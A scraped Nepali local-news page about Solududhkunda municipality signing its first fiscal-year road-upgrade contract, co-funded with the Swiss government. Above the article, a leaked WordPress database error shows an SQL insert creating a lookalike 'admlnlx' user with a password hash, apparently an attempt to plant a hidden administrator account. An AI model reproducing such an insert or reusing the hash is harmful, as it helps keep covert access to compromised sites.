WordPress database error: [Duplicate entry '0' for key 'PRIMARY']
INSERT INTO `gi_users` (`user_pass`, `user_nicename`, `user_email`, `user_url`, `user_registered`, `user_activation_key`, `display_name`, `user_login`) VALUES ('$P$BWWdRv0nqx4jIW.BGo/weDkCOhoMaC1', 'admlnlx', 'wordpresupport@gaulekhabar.com', '', '2026-01-13 04:06:31', '', 'admlnlx', 'admlnlx')

नगरपालिकाले थाल्यो विकासे काम, गर्‍यो पहिलो योजना सम्झौता – Gaule Khabar

नगरपालिकाले थाल्यो विकासे काम, गर्‍यो पहिलो योजना सम्झौता

नगरपालिकाले थाल्यो विकासे काम, गर्‍यो पहिलो योजना सम्झौता

सोलुखुम्बु । सोलुदुधकुण्ड नगरपालिकाले आर्थिक वर्ष २०८०/८१ का लागि पहिलो योजना सम्झौता गर्दै साउनबाट नै विकासे कामको शुरुवात गरेको छ ।

सोलुदुधकुण्ड नगरपालिका–१० को लुम्सा–जुके–दिमिल सडक स्तरोन्नती गर्नका लागि सोलुदुकुण्ड नगरपालिका–११ को संगीता कन्स्ट्रक्सन र सोलुदुधकुण्ड नगरपालिका बिच २०८० पुस १४ गते निर्माण सम्पन्न गर्ने गरी आज ठेक्का सम्झौता भएको सोलुदुकुण्ड नगरपालिकाका प्रमुख प्रशासकीय अधिकृत कोपिला राईले जानकारी दिए ।

यस आर्थिक वर्षकै पहिलो योजना सम्झौतापछि नगरप्रमुख नाम्गेलजाङ्बु शेर्पाले भन्नुभयो– ‘नगरबासीको हित तथा नगरपालिकाको विकासका लागि आफू सँधै लागिपरेको छु, बाँकी कार्यकालमा नगरको विकासको गति बढाउने मेरो योजना छ ।’

नगरप्रमुख शेर्पाले समयमा नै काम शुरु गर्दा आयोजना सम्पन्न गर्न सहज हुने भन्दै गुणस्तरीय काम गर्न ठेकेदार कम्पनीलाई निर्देशन दिए ।

सोलुदुधकुण्ड नगरपालिका र स्वीस सरकारको ५०/५० प्रतिशतको लागत साझेदारीमा बन्ने करिब पाँच किलोमिटर सडकको लागत एक करोड ११ लाख ८५ हजार रुपियाँ रहेको छ ।
उक्त सडकमा करिब चार हजार नौ सय मिटर सोलिङ, विभिन्न स्थानमा ह्युम पाइप राख्ने, सात सय मिटर ग्राभेल गर्ने, केही स्थानमा ग्याभिन वाल लगाउने र एक स्थानमा कल्भर्ट निर्माण गरिने सोलुदुधकुण्ड नगरपालिकाका इन्जिनियर फुर्वा शेर्पाले जानकारी दिए ।

तपाइको प्रतिक्रिया दिनुहोस्

Your email address will not be published. Required fields are marked *

हामी तपाईंको इमे अरू सैसँग साझा र्दैनं।

ट्रेन्डिङ

धेरै कमेन्ट गरिएका